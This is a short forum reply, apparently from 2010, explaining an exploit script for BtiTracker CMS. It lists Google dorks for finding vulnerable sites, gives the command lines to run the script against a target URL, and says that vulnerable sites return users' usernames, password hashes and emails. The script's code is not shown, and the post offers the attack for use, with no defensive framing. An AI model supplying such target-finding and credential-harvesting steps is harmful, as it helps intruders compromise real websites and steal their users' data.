Cita de: ..::| D3Bć1 |::. en 11 Junio 2010, 14:55 PM
What it does exactly?
Cheers
Exploit for BtiTracker CMS.
Find one [google dorks, allinurl:"BtiTracker 1.4", inurl:"reqdetails.php" & intext:"BtiTracker", etc], and type in cmd / terminal:
Código [Seleccionar]
python isr.py http://www.site.com [Number]
./isr.py isr.py http://www.site.com [Number]
And if it's vulnerable, you'll get the Username, Password [hash], and Email.